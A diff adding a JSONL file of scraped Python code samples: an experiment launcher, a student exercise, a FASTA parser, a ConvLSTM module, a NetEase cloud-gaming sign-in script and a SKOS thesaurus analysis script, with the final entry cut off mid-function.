diff --git "a/5364.jsonl" "b/5364.jsonl" new file mode 100644--- /dev/null +++ "b/5364.jsonl" @@ -0,0 +1,679 @@ +{"seq_id":"580490698","text":"import argparse\nfrom session import PRFSession\n\ndef main(subject, run, reset):\n session = PRFSession(subject_initials=subject,\n index_number=run,\n reset_positions=reset,\n simulate_mri_trigger=True)\n session.run()\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"subject\",\n #nargs='?',\n type=str,\n help=\"Subject experiment\")\n parser.add_argument(\"run\",\n type=str,\n default='*',\n help=\"Run experiment\")\n parser.add_argument(\"-r\",\n \"--reset\",\n action='store_true',\n help=\"Whether to reset positiong parameters to default.\")\n args = parser.parse_args()\n main(subject=args.subject,\n run=args.run,\n reset=args.reset)\n","sub_path":"expt/prf.py","file_name":"prf.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"159905796","text":"# -*- coding: utf-8 -*-\nfrom __future__ import division\nimport math\ndef maiorDegrau(a):\n maior=0\n for i in range(o,len(a)-1,1):\n degrau= math.fabs(a[i]-a[i+1])\n if degrau>maior:\n maior=degrau\n return maior\n\n\n","sub_path":"moodledata/vpl_data/51/usersdata/97/22468/submittedfiles/listas.py","file_name":"listas.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"72664929","text":"import sys\nimport re\ngenes = {}\nid = ''\nseq = ''\nclass invalidseq(Exception):\n\tpass\n\ntry:\n\tfile = sys.argv[1]\n\tprint('fasta provided', file)\n\n\tif not file.endswith('.fa') or not file.endswith('.fasta') or not file.endswith('.nt'):\n\t\traise ValueError('Not a valid file format')\n\n\tfor line in dna:\n\t\tif '>' in line:\n\t\t\tid = (line.strip())\n\t\t\tgenes[id] = seq\n\telse:\n\t\tseq = (line.strip())\n\t\tgenes[id] += seq\n\t\tif re.search('[^ATGCN]+', genes(id)):\n\t\t\traise invalidseq('not found in seq')\nexcept IndexError:\n\tprint('No file given')\nexcept IOError:\n\tprint('Cannot find file')\nexcept ValueError:\n\tprint('Invalid file format')\nexcept invalidseq:\n\tprint('Nucleotides not found in seq')\n","sub_path":"python8/question3final.py","file_name":"question3final.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"383270644","text":"import torch\r\nimport torch.nn as nn\r\nimport math\r\nfrom torch.nn import init\r\n\r\n\r\nclass ConvLSTMCell_LayerNorm(nn.Module):\r\n def __init__(self, input_size, hidden_size, kernel_size, stride,\r\n bias=True, layer_norm=True, elementwise_affine=False, reset=False):\r\n # input_size, hidden_size --> C,H,W\r\n # kernel_size, stride --> int\r\n super(ConvLSTMCell_LayerNorm, self).__init__()\r\n input_dim, input_height, input_width = input_size\r\n hidden_dim, hidden_height, hidden_width = hidden_size\r\n padding = kernel_size // 2\r\n\r\n self.conv = nn.Conv2d(in_channels=input_dim + hidden_dim,\r\n out_channels=4 * hidden_dim,\r\n kernel_size=kernel_size,\r\n stride=stride,\r\n padding=padding,\r\n bias=bias)\r\n if layer_norm is True:\r\n self.LN = nn.LayerNorm(normalized_shape=hidden_size, elementwise_affine=elementwise_affine)\r\n\r\n self.layer_norm = layer_norm\r\n self.hidden_size = hidden_size\r\n self.hidden_dim = hidden_dim\r\n\r\n if reset is True:\r\n self.reset_parameters()\r\n\r\n def forward(self, input_tensor, cur_state=None):\r\n # batch_size, channel, height, width\r\n if cur_state is None:\r\n h_cur = input_tensor.new_zeros(input_tensor.shape, requires_grad=False)\r\n c_cur = h_cur\r\n else:\r\n h_cur, c_cur = cur_state\r\n\r\n combined = torch.cat([input_tensor, h_cur], dim=1) # concatenate along channel axis\r\n combined_conv = self.conv(combined)\r\n cc_i, cc_f, cc_o, cc_g = torch.split(combined_conv, self.hidden_dim, dim=1)\r\n\r\n if self.layer_norm is True:\r\n cc_i = self.LN(cc_i)\r\n cc_f = self.LN(cc_f)\r\n cc_o = self.LN(cc_o)\r\n cc_g = self.LN(cc_g)\r\n\r\n i = torch.sigmoid(cc_i)\r\n f = torch.sigmoid(cc_f)\r\n o = torch.sigmoid(cc_o)\r\n g = torch.tanh(cc_g)\r\n\r\n c_next = f * c_cur + i * g\r\n\r\n if self.layer_norm is True:\r\n c_next = self.LN(c_next)\r\n\r\n h_next = o * torch.tanh(c_next)\r\n\r\n return h_next, c_next\r\n\r\n def reset_parameters(self):\r\n stdv = 1.0 / math.sqrt(self.hidden_size[0] * self.hidden_size[1] * self.hidden_size[2])\r\n for weight in self.parameters():\r\n init.uniform_(weight, -stdv, stdv)\r\n\r\n\r\nclass ConvLSTM_LayerNorm(nn.Module):\r\n def __init__(self, input_size, hidden_size, num_layers=1, kernel_size=3, stride=1,\r\n bias=True, layer_norm=True, elementwise_affine=False, reset=False):\r\n super(ConvLSTM_LayerNorm, self).__init__()\r\n\r\n cell_list = []\r\n for i in range(0, num_layers):\r\n cell_list.append(ConvLSTMCell_LayerNorm(input_size=input_size,\r\n hidden_size=hidden_size,\r\n kernel_size=kernel_size,\r\n stride=stride,\r\n bias=bias,\r\n layer_norm=layer_norm,\r\n elementwise_affine=elementwise_affine,\r\n reset=reset))\r\n self.cell_list = nn.ModuleList(cell_list)\r\n self.hidden_size = hidden_size\r\n self.num_layers = num_layers\r\n\r\n def forward(self, input_tensor, hidden_state=None):\r\n # batch_size, seq_len, input_channel, input_height, input_width\r\n\r\n if hidden_state is None:\r\n h_cur = input_tensor.new_zeros(\r\n (input_tensor.size(0), input_tensor.size(2), input_tensor.size(3), input_tensor.size(4)),\r\n requires_grad=False)\r\n c_cur = h_cur\r\n\r\n seq_len = input_tensor.size(1)\r\n cur_layer_input = input_tensor\r\n\r\n for layer_idx in range(self.num_layers):\r\n output_inner = []\r\n h = h_cur\r\n c = c_cur\r\n for t in range(seq_len):\r\n h, c = self.cell_list[layer_idx](input_tensor=cur_layer_input[:, t, :, :, :],\r\n cur_state=(h, c))\r\n output_inner.append(h)\r\n\r\n layer_output = torch.stack(output_inner, dim=1)\r\n cur_layer_input = layer_output\r\n\r\n return cur_layer_input\r\n","sub_path":"ConvLSTM.py","file_name":"ConvLSTM.py","file_ext":"py","file_size_in_byte":4502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"551257750","text":"import requests\nimport json\nfrom getENV import getENv\nfrom checksendNotify import send\n\n\"\"\"\n建议cron: 20 8 * * *\nnew Env('网易云游戏');\n\"\"\"\n\ndef game163(Authorization):\n headers = {\n 'user-agent': 'Mozilla/5.0 (Linux; Android 10; Redmi K30 Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/85.0.4183.127 Mobile Safari/537.36',\n ## 下面填抓包来的参数########\n 'Authorization': Authorization\n }\n url = 'http://n.cg.163.com/api/v2/sign-today'\n r = requests.post(url, headers=headers).text\n if r[0] == \"{\":\n return \"cookie已失效\"\n else:\n return \"签到成功\"\n\n\ndef start():\n getENv()\n with open(\"/usr/local/app/script/Shell/check.json\", \"r\", encoding=\"utf-8\") as f:\n datas = json.loads(f.read())\n _check_item = datas.get(\"163game\", [])\n res = game163(_check_item.get('Authorization'))\n print(res)\n send(\"网易云游戏\", res)\n\nif __name__ == \"__main__\":\n start()","sub_path":"ck_163game.py","file_name":"ck_163game.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"70128539","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nAnalyze thesauri\r\n\r\nScript with functions to analyze a thesaurus.\r\n\"\"\"\r\n\r\n__author__ = \"Quinten van Langen\"\r\n__version__ = \"1.0.0\"\r\n__license__ = \"cc0-1.0\"\r\n\r\n\r\nimport pickle\r\nimport xml.etree.ElementTree as ET\r\nimport pandas as pd\r\nimport os\r\nfrom datetime import datetime\r\nimport random\r\nfrom sets import Set\r\nimport re\r\nfrom anytree import Node\r\n\r\ndef time(start):\r\n return datetime.now() - start\r\n\r\ndef find_matches(dict1): # Create a list and dictionary of stored matches\r\n matches_dict = {}\r\n AAT_match_list = []\r\n Dutch_AAT_match_list = []\r\n misplaced_AAT_list = []\r\n\r\n for concept in dict1:\r\n matches = dict1[concept]['matches']\r\n for match in matches:\r\n if 'aat' in match:\r\n if 'vocab.getty.edu' in match:\r\n match = re.findall(r'\\b\\d+\\b', match)[-1]\r\n matches_dict[match] = concept\r\n AAT_match_list.append(match)\r\n elif 'browser.aat-ned' in match:\r\n matches_dict[match] = concept\r\n Dutch_AAT_match_list.append(match)\r\n else:\r\n misplaced_AAT_list.append(match)\r\n AAT_match_list = list(set(AAT_match_list))\r\n print('{} Created lists and dictionary of AAT matches'\r\n .format(time(start)))\r\n return matches_dict, AAT_match_list, Dutch_AAT_match_list, misplaced_AAT_list\r\n \r\ndef match_in_AAT(AAT_dict, AAT_match_list): # Check if a match is present in the AAT dictionary\r\n matches_in_aat_dict = {}\r\n matches_in_aat_list = []\r\n for concept in AAT_dict:\r\n the_id = str(AAT_dict[concept]['id'])\r\n if the_id in AAT_match_list:\r\n matches_in_aat_dict[concept] = the_id\r\n matches_in_aat_list.append(the_id)\r\n\r\n matches_in_aat_list = list(set(matches_in_aat_list))\r\n print('{} Searched for the matches in AAT'\r\n .format(time(start)))\r\n return matches_in_aat_list, matches_in_aat_dict\r\n\r\ndef matches_not_in_parse(match_dict, match_list1, match_list2, RT_dict): # determine the amount of matches that are not parsed from the AAT\r\n difference_list = list(set(match_list1) - set(match_list2))\r\n missing_aat_list = []\r\n for difference in difference_list:\r\n missing_aat_list.append(RT_dict[match_dict[difference]])\r\n return missing_aat_list\r\n\r\ndef own_overlap(thesaurus_dict): #Look at the overlap in labels within a thesaurus\r\n copy_dict = dict(thesaurus_dict)\r\n the_own_overlap_dict = {}\r\n label_list = []\r\n\r\n for concept1 in thesaurus_dict:\r\n labels_concept1 = thesaurus_dict[concept1]['prefLabel'] + thesaurus_dict[concept1]['altLabel']\r\n concept1 = re.findall(r'\\b\\d+\\b', concept1)[-1]\r\n for a_label in labels_concept1:\r\n for concept2 in copy_dict:\r\n labels_concept2 = copy_dict[concept2]['prefLabel'] + copy_dict[concept2]['altLabel']\r\n concept2 = re.findall(r'\\b\\d+\\b', concept2)[-1] \r\n if a_label in labels_concept2:\r\n combination_list = [concept2, a_label]\r\n combination_list2 = [concept1, a_label]\r\n if combination_list == combination_list2:\r\n continue\r\n if a_label not in label_list:\r\n if concept2 in the_own_overlap_dict and combination_list2 in the_own_overlap_dict[concept2]:\r\n continue\r\n else:\r\n if concept1 not in the_own_overlap_dict:\r\n the_own_overlap_dict[concept1] = [combination_list]\r\n elif combination_list not in the_own_overlap_dict[concept1]:\r\n the_own_overlap_dict[concept1].append(combination_list)\r\n label_list.append(a_label)\r\n the_own_overlap_list = restructure_dict_to_list(the_own_overlap_dict)\r\n return the_own_overlap_dict\r\n\r\ndef store_dict(dict, picklefile): # Store a Python dictionary in a pickle file\r\n output = open(picklefile, wb)\r\n pickle.dump(dict, output)\r\n output.close()\r\n\r\ndef restructure_dict_to_list(dict): # Restructures the own overlap dictionary to a list\r\n return_list = []\r\n for overlap in dict:\r\n for a_list in dict[overlap]:\r\n new_list = [overlap] + a_list\r\n return_list.append(new_list)\r\n return return_list\r\n\r\ndef find_overlap(full_dict1, full_dict2): # Search for all overlapping concepts based on the labels\r\n overlap_dict = {}\r\n for concept1 in full_dict1:\r\n concept1_labels = full_dict1[concept1]['prefLabel'] + full_dict1[concept1]['altLabel']\r\n for a_label in concept1_labels:\r\n for concept2 in full_dict2:\r\n concept2_labels = full_dict2[concept2]['prefLabel'] + full_dict2[concept2]['altLabel']\r\n if a_label in AAT_labels:\r\n concept1_matches = full_dict1[concept1]['matches']\r\n if concept1 in overlap_dict:\r\n overlap_dict[concept1].append(a_label)\r\n else:\r\n overlap_dict[concept1] = [concept2, rt_matches, a_label]\r\n\r\n store_dict(overlap_dict, 'overlap_dict2.pkl')\r\n print('{} Finished looking at ovelap and stored the overlapping concepts in a dictionary'\r\n .format(time(start)))\r\n return overlap_dict\r\n\r\ndef matched_overlap(overlap_dict, match_dict): #Look at the amount of overlapping concepts have a match stored as url\r\n count = 0\r\n stored_match_types = {}\r\n overlap_list = []\r\n for overlap in overlap_dict:\r\n list_of_labels = create_list_of_labels(overlap_dict[overlap])\r\n the_id = re.findall(r'\\b\\d+\\b', overlap)[-1]\r\n overlap_list.append(the_id + list_of_labels)\r\n if the_id in match_dict:\r\n concept1 = overlap_dict[overlap][0]\r\n concept_types = full_RT[RT_concept]['schemes']\r\n for a_type in concept_types:\r\n if a_type not in stored_match_types:\r\n stored_match_types[a_type] = 1\r\n else:\r\n stored_match_types[a_type] += 1\r\n count += 1\r\n print('{} {} of the {} overlapping concepts are already matched'\r\n .format(time(start), count, len(overlap_dict)))\r\n matched_overlap_count = count\r\n return matched_overlap_count, stored_match_types, overlap_list\r\n\r\ndef create_list_of_labels(dict_list): #creates a list of labels from the list made for the overlap dictionary\r\n return_list = []\r\n label_list = []\r\n for item in dict_list:\r\n if dict_list.index(item) > 1:\r\n label_list.append(item)\r\n else:\r\n return_list.append(item)\r\n return_list.append(label_list)\r\n return return_list\r\n\r\ndef find_type_of_overlap(overlap_dict, full_dict): # Look at the types and their amounts of the overlap concepts\r\n overlap_types = {}\r\n for overlap in overlap_dict:\r\n the_concept = overlap_dict[overlap][0]\r\n the_types = full_dict[the_concept]['schemes']\r\n for a_type in the_types:\r\n if a_type not in overlap_types:\r\n overlap_types[a_type] = 1\r\n else:\r\n overlap_types[a_type] += 1\r\n return overlap_types\r\n\r\ndef write_to_xlsxfile(values, filename, sheet_name, headers):\r\n writer = pd.ExcelWriter(filename, engine='xlsxwriter')\r\n if type(values) == dict:\r\n if headers == []:\r\n the_dataframe = pd.Dataframe.from_dict(values, orient='index')\r\n else:\r\n the_dataframe = pd.Dataframe.from_dict(values, orient='index', columns=headers)\r\n elif type(values) == list:\r\n if headers == []:\r\n the_dataframe = pd.Dataframe(values)\r\n else:\r\n the_dataframe = pd.Dataframe(values, columns=headers)\r\n else:\r\n return None\r\n the_dataframe.t0_excel(writer, sheet_name= sheet_name)\r\n writer.close()\r\n\r\ndef load_dictionaries(): # Load pickle dictionaries\r\n\r\n start = datetime.now()\r\n os.chdir('out')\r\n # Load the Rijksmuseum thesaurus, AAT and overlap dictionaries\r\n full_RT = pickle.load( open( \"full2_dictionary.pkl\", \"rb\" ) )\r\n print('{} Loaded the Rijksmuseum dictionary'\r\n .format(time(start)))\r\n\r\n full_AAT = pickle.load(open('AAT/AAT_full_dictionary.pkl', 'rb'))\r\n print('{} Loaded the AAT dictionary'\r\n .format(time(start)))\r\n\r\n overlap_dict = pickle.load(open('overlap_dict.pkl', 'rb'))\r\n print('{} Loaded the overlap dictionary'\r\n .format(time(start)))\r\n\r\n full_own = pickle.load( open( \"own_overlap_dict.pkl\", \"rb\" ) )\r\n print('{} Loaded the own Rijksmuseum overlap dictionary with a length of {}'\r\n .format(time(start), len(full_own)))\r\n\r\n full_own_AAT = pickle.load( open( \"shorten_own_overlap_dict_AAT.pkl\", \"rb\" ) )\r\n print('{} Loaded the own overlap AAT dictionary with a length of {}'\r\n .format(time(start), len(full_own_AAT)))\r\n\r\ndef list_concepts(dom):\r\n # Create a list with the id's of the SKOS concepts\r\n concept_identifiers = []\r\n root = dom.childNodes.item(0)\r\n\r\n for node in root.childNodes:\r\n if (node.nodeType == node.ELEMENT_NODE\r\n and node.nodeName == 'skos:Concept'):\r\n concept_id = node.attributes.items()[0][1]\r\n concept_identifiers.append(concept_id)\r\n return concept_identifiers\r\n\r\n\r\ndef referenced_concept_schemes(dom):\r\n # List all concept schemes referenced in the thesaurus\r\n concept_schemes = []\r\n root = dom.childNodes.item(0)\r\n\r\n for node in root.childNodes:\r\n for property in node.childNodes:\r\n if (property.nodeType == property.ELEMENT_NODE\r\n and property.nodeName == 'skos:inScheme'):\r\n concept_scheme = property.attributes.items()[0][1]\r\n if concept_scheme not in concept_schemes:\r\n concept_schemes.append(concept_scheme)\r\n return concept_schemes\r\n\r\n\r\ndef list_schemeless_concepts(dom):\r\n # List all concepts without that do not reference a concept scheme\r\n schemeless_concepts = []\r\n root = dom.childNodes.item(0)\r\n\r\n for node in root.childNodes:\r\n if (node.nodeType == node.ELEMENT_NODE\r\n and node.nodeName == 'skos:Concept'):\r\n concept_id = node.attributes.items()[0][1]\r\n in_scheme = False\r\n\r\n for property in node.childNodes:\r\n if property.nodeName == 'skos:inScheme':\r\n in_scheme = True\r\n if not in_scheme:\r\n schemeless_concepts.append(concept_id)\r\n return schemeless_concepts\r\n\r\n\r\ndef create_inverse_hierarchy(dom):\r\n # The inverse of every hierarchical skos relation is added to a dictionary:\r\n # {'http://concept.net/2': {'skos:broader': ['http://concept.net/1']}}\r\n hierarchy_dict = {}\r\n hierarchy_labels = ['skos:broader', 'skos:narrower', 'skos:related']\r\n root = dom.childNodes.item(0)\r\n\r\n for node in root.childNodes:\r\n for property in node.childNodes:\r\n if (property.nodeType == property.ELEMENT_NODE\r\n and (property.nodeName in hierarchy_labels)):\r\n concept_id = node.attributes.items()[0][1]\r\n prop_name = property.nodeName\r\n prop_inv = inverse_property(prop_name)\r\n object_id = property.attributes.items()[0][1]\r\n\r\n if object_id not in hierarchy_dict:\r\n hierarchy_dict[object_id] = {}\r\n hierarchy_dict[object_id][prop_inv] = [concept_id]\r\n elif prop_inv not in hierarchy_dict[object_id]:\r\n hierarchy_dict[object_id][prop_inv] = [concept_id]\r\n else:\r\n hierarchy_dict[object_id][prop_inv].append(concept_id)\r\n return hierarchy_dict\r\n\r\n\r\n\r\ndef inverse_property(property_name):\r\n if property_name == 'skos:broader':\r\n return 'skos:narrower'\r\n elif property_name == 'skos:narrower':\r\n return 'skos:broader'\r\n else:\r\n return 'skos:related'\r\n\r\n\r\ndef missing_outward_references(dom):\r\n inverse_hierarchy = create_inverse_hierarchy(dom)\r\n missing_references = []\r\n\r\n # Iterate through all concepts in inverse_hierarchy to check whether\r\n # all deduced references are present for the concept in question\r\n for concept_id in inverse_hierarchy:\r\n concept = get_concept(dom, concept_id)\r\n if concept is not None:\r\n properties = hierarchical_properties_dict(concept, 'no')\r\n i_properties = inverse_hierarchy[concept_id]\r\n missing = outward_difference(concept_id, properties, i_properties)\r\n if missing != []:\r\n missing_references.append(missing)\r\n return missing_references\r\n\r\n\r\ndef outward_difference(concept_id, props, i_props):\r\n missing_references = []\r\n\r\n for h_label in i_props:\r\n if h_label in i_props and h_label in props:\r\n diff = list(set(i_props[h_label]) - set(props[h_label]))\r\n else:\r\n diff = i_props[h_label]\r\n if diff != []:\r\n missing = [concept_id, h_label, diff]\r\n missing_references.append(missing)\r\n return missing_references\r\n \r\n\r\ndef get_concept(dom, concept_id):\r\n root = dom.childNodes.item(0)\r\n\r\n for node in root.childNodes:\r\n if (node.nodeType == node.ELEMENT_NODE\r\n and node.nodeName == 'skos:Concept'):\r\n if concept_id == node.attributes.items()[0][1]:\r\n return node\r\n return None\r\n\r\ndef get_concept_scheme(dom, scheme):\r\n root = dom.childNodes.item(0)\r\n for node in root.childNodes:\r\n if (node.nodeType == node.ELEMENT_NODE\r\n and node.nodeName == 'skos:ConceptScheme'):\r\n if scheme == node.attributes.items()[0][1]:\r\n return node\r\n return None\r\n\r\n\r\ndef get_relation_property(concept, property, attribute):\r\n for node in concept.childNodes:\r\n if (node.nodeType == node.ELEMENT_NODE\r\n and node.nodeName == property \r\n and node.attributes.items()[0][1] == attribute):\r\n return node\r\n return None\r\n\r\n\r\ndef undefined_concept_references(dom):\r\n missing_references = []\r\n concepts = list_concepts(dom)\r\n root = dom.childNodes.item(0)\r\n hierarchy_labels = ['skos:broader', 'skos:narrower', 'skos:related']\r\n\r\n # Iterate through all concepts to check if they include references\r\n # to concepts that do not exist\r\n for node in root.childNodes:\r\n if (node.nodeType == node.ELEMENT_NODE\r\n and node.nodeName == 'skos:Concept'):\r\n concept_id = node.attributes.items()[0][1]\r\n\r\n for property in node.childNodes:\r\n if (property.nodeType == property.ELEMENT_NODE\r\n and property.nodeName in hierarchy_labels):\r\n object_id = property.attributes.items()[0][1]\r\n h_label = property.nodeName\r\n if object_id not in concepts:\r\n missing = [concept_id, h_label, object_id]\r\n missing_references.append(missing)\r\n return missing_references\r\n\r\n\r\ndef hierarchical_properties_dict(node, extra):\r\n # Each hierarchical property is stored in a dictionary with the name of the\r\n # property and its value.\r\n hierarchical_properties = {}\r\n hierarchy_labels = ['skos:broader', 'skos:narrower', 'skos:related']\r\n\r\n for property in node.childNodes:\r\n if (property.nodeType == property.ELEMENT_NODE\r\n and property.nodeName in hierarchy_labels):\r\n prop_name = property.nodeName\r\n if extra == 'yes':\r\n object_id = re.findall(r'\\b\\d+\\b', property.attributes.items()[0][1])[-1]\r\n else:\r\n object_id = property.attributes.items()[0][1]\r\n if prop_name in hierarchical_properties:\r\n hierarchical_properties[prop_name].append(object_id)\r\n else:\r\n hierarchical_properties[prop_name] = [object_id]\r\n return hierarchical_properties\r\n\r\ndef label_properties_dict(node):\r\n # Each label is stored in a dictionary with the label itself and it's language\r\n label_properties = {}\r\n label_labels = ['skos:prefLabel', 'skos:altLabel']\r\n label_properties['prefLabel'] = []\r\n label_properties['altLabel'] = []\r\n for property in node.childNodes:\r\n if (property.nodeType == property.ELEMENT_NODE\r\n and property.nodeName in label_labels):\r\n property_dict = {}\r\n prop_name = property.nodeName[5:]\r\n language = str(property.attributes.items()[0][1])\r\n label = str(property.childNodes[0].data.encode('utf-8'))\r\n property_dict['language'] = language\r\n property_dict['label'] = label\r\n label_properties[prop_name].append(property_dict)\r\n return label_properties\r\n\r\ndef extra_properties_dict(node):\r\n # Some extra properties for a concept are stored in a dictionary\r\n extra_properties_dict = {}\r\n extra_labels = ['skos:scopeNote', 'skos:exactMatch', 'skos:topConceptOf']\r\n create_labels = ['notes', 'matches']\r\n for label in create_labels:\r\n extra_properties_dict[label] = []\r\n topConcept_count = 0\r\n for property in node.childNodes:\r\n if (property.nodeType == property.ELEMENT_NODE\r\n and property.nodeName in extra_labels):\r\n prop_name = property.nodeName[5:]\r\n if prop_name == 'scopeNote':\r\n the_note = str(property.childNodes[0].data.encode('utf-8'))\r\n extra_properties_dict['notes'].append(the_note)\r\n elif prop_name == 'topConceptOf':\r\n topConcept_count += 1\r\n elif prop_name == 'exactMatch':\r\n match = property.attributes.items()[0][1]\r\n extra_properties_dict['matches'].append(match)\r\n extra_properties_dict['#Top concepts'] = topConcept_count\r\n return extra_properties_dict\r\n\r\ndef restructure_missing_references(a_list):\r\n # Restructures the list of missing references\r\n return_list = []\r\n for i in a_list:\r\n for j in i:\r\n another_list = j[-1]\r\n j.pop()\r\n for the in another_list:\r\n copy_j = list(j)\r\n copy_j.append(str(the))\r\n return_list.append(copy_j)\r\n return return_list\r\n\r\ndef find_top_concepts(dom):\r\n # Create a list of concepts without broader concepts\r\n root = dom.childNodes.item(0)\r\n list_of_top_concepts = []\r\n for node in root.childNodes:\r\n if (node.nodeType == node.ELEMENT_NODE\r\n and node.nodeName == 'skos:Concept'):\r\n hierarchical_properties = hierarchical_properties_dict(node, 'no')\r\n concept_id = node.attributes.items()[0][1]\r\n if 'skos:broader' not in hierarchical_properties:\r\n list_of_top_concepts.append(concept_id)\r\n return list_of_top_concepts\r\n\r\ndef find_all_schemes(dom, extra):\r\n # Create a dictionary which stores all schemes of a concept\r\n schemes_dict = {}\r\n root = dom.childNodes.item(0)\r\n for node in root.childNodes:\r\n if (node.nodeType == node.ELEMENT_NODE\r\n and node.nodeName == 'skos:Concept'):\r\n if extra == 'yes':\r\n concept_id = re.findall(r'\\b\\d+\\b', node.attributes.items()[0][1])[-1]\r\n else:\r\n concept_id = node.attributes.items()[0][1]\r\n schemes_dict[concept_id] = []\r\n for property in node.childNodes:\r\n if property.nodeName == 'skos:inScheme':\r\n if extra == 'yes':\r\n scheme_label = property.attributes.items()[0][1][42:]\r\n else:\r\n scheme_label = property.attributes.items()[0][1]\r\n schemes_dict[concept_id].append(scheme_label)\r\n return schemes_dict\r\n\r\ndef all_properties(dom, extra):\r\n # Create a list of all relevant properties for each concept\r\n all_properties_dict = {}\r\n schemes_dict = find_all_schemes(dom, 'yes')\r\n root = dom.childNodes.item(0)\r\n for concept in root.childNodes:\r\n if (concept.nodeType == concept.ELEMENT_NODE\r\n and concept.nodeName == 'skos:Concept'):\r\n concept_id = re.findall(r'\\b\\d+\\b', concept.attributes.items()[0][1])[-1]\r\n all_properties_dict[concept_id] = {}\r\n all_properties_dict[concept_id][\"id\"] = concept_id\r\n all_properties_dict[concept_id].update(hierarchical_properties_dict(concept, 'yes'))\r\n hierarchy_labels = ['skos:broader', 'skos:narrower', 'skos:related']\r\n for label in hierarchy_labels:\r\n if label not in all_properties_dict[concept_id]:\r\n all_properties_dict[concept_id][label] = []\r\n all_properties_dict[concept_id].update(label_properties_dict(concept))\r\n if extra == 'yes':\r\n all_properties_dict[concept_id]['schemes'] = schemes_dict[concept_id]\r\n all_properties_dict[concept_id].update(extra_properties_dict(concept))\r\n all_properites_dict = determine_depth(all_properties_dict)\r\n\r\n all_properties_list = []\r\n for a_concept in all_properties_dict:\r\n all_properties_list.append(all_properties_dict[a_concept])\r\n return all_properties_list\r\n\r\n\r\n\r\ndef determine_depth(concept_dict):\r\n # Determining the depth of each concept in the hierarchical tree\r\n list_of_tuples = []\r\n node_dict = {}\r\n for concept in concept_dict:\r\n concept_id = concept_dict[concept]['id']\r\n node_dict[concept_id] = Node(str(concept_id))\r\n broader = concept_dict[concept]['skos:broader']\r\n if broader == []:\r\n continue\r\n for b in broader:\r\n new_tuple = (concept_id, b)\r\n if new_tuple not in list_of_tuples:\r\n list_of_tuples.append(new_tuple)\r\n for j in list_of_tuples:\r\n child = j[0]\r\n parent = j[1]\r\n if child == parent:\r\n continue\r\n if child in concept_dict and parent in concept_dict:\r\n node_dict[child].parent = node_dict[parent]\r\n for concept in concept_dict:\r\n depth = int(len(node_dict[concept_dict[concept]['id']].path) - 1)\r\n concept_dict[concept]['Depth'] = depth\r\n return concept_dict\r\n\r\ndef reference_analyse(list):\r\n # Perform quantitative analysis of the reference properties\r\n references_dict = {}\r\n total_broader = {}\r\n total_narrower = {}\r\n total_related = {}\r\n for concept in list:\r\n broader = concept['skos:broader']\r\n narrower = concept['skos:narrower']\r\n related = concept['skos:related']\r\n number_broader = len(broader)\r\n number_narrower = len(narrower)\r\n number_related = len(related)\r\n references_dict[concept['id']] = [number_broader, number_narrower, number_related]\r\n total = number_broader + number_narrower + number_related\r\n if number_broader in total_broader:\r\n total_broader[number_broader] += 1\r\n else:\r\n total_broader[number_broader] = 1\r\n if number_narrower in total_narrower:\r\n total_narrower[number_narrower] += 1\r\n else:\r\n total_narrower[number_narrower] = 1\r\n if number_related in total_related:\r\n total_related[number_related] += 1\r\n else:\r\n total_related[number_related] = 1\r\n return_list = [total_broader, total_narrower, total_related]\r\n reference_dict = create_reference_dict(references_dict)\r\n return reference_dict, return_list\r\n\r\ndef create_reference_dict(dict):\r\n # Create a type of dictionary about all references of a concept\r\n reference_dict = {}\r\n for concept in dict:\r\n references = dict[concept]\r\n string_references = \"\"\r\n for i in references:\r\n string_references += str(i)\r\n string_references += '-'\r\n string_references = ''.join(string_references.split())[:-1].upper()\r\n if string_references in reference_dict:\r\n reference_dict[string_references] += 1\r\n else:\r\n reference_dict[string_references] = 1\r\n return reference_dict\r\n\r\ndef label_analyse(list):\r\n # Perform a quantitative analysis on the labels of a concept\r\n concept_label_dict = {}\r\n count_label_dict = {}\r\n language_label_dict = {}\r\n count_label_dict ['pref'] = {}\r\n count_label_dict ['alt'] = {}\r\n language_label_dict ['pref'] = {}\r\n language_label_dict ['alt'] = {}\r\n for concept in list:\r\n concept_id = concept['id']\r\n label_dict = {}\r\n pref = concept['prefLabel']\r\n alt = concept['altLabel']\r\n label_dict['pref'] = pref\r\n label_dict['alt'] = alt\r\n if len(pref) in count_label_dict ['pref']:\r\n count_label_dict ['pref'][len(pref)] += 1\r\n else:\r\n count_label_dict ['pref'][len(pref)] = 1\r\n if len(alt) in count_label_dict ['alt']:\r\n count_label_dict ['alt'][len(alt)] += 1\r\n else:\r\n count_label_dict ['alt'][len(alt)] = 1\r\n label_dict['#pref'] = len(pref)\r\n label_dict['#alt'] = len(alt)\r\n pref_language_list = []\r\n for i in pref:\r\n language = i['language']\r\n pref_language_list.append(language)\r\n language_label_dict ['pref'][language] = language_label_dict ['pref'].get(language, 0) + 1\r\n label_dict['Pref languages'] = pref_language_list\r\n alt_language_list = []\r\n for i in alt:\r\n language = i['language']\r\n alt_language_list.append(language)\r\n language_label_dict ['alt'][language] = language_label_dict ['alt'].get(language, 0) + 1\r\n label_dict['Alt languages'] = alt_language_list\r\n concept_label_dict[concept['id']] = label_dict\r\n return concept_label_dict, language_label_dict, count_label_dict\r\n\r\ndef is_number(s):\r\n # Check if a string is a number\r\n try:\r\n float(s)\r\n return True\r\n except ValueError:\r\n return False \r\n\r\ndef matches_analyse(list):\r\n # Perform a quantitative \r\n key_list = ['none', 'AAT', 'TGN', 'MIMO', 'Wiki', 'Numbers', 'Geonames', 'other']\r\n number_matches_dict = {}\r\n for key in key_list:\r\n number_matches_dict[key] = 0\r\n for concept in list:\r\n if len(concept['matches']) == 0:\r\n number_matches_dict['none'] += 1\r\n else:\r\n for match in concept['matches']:\r\n if 'aat' in match:\r\n number_matches_dict['AAT'] += 1\r\n 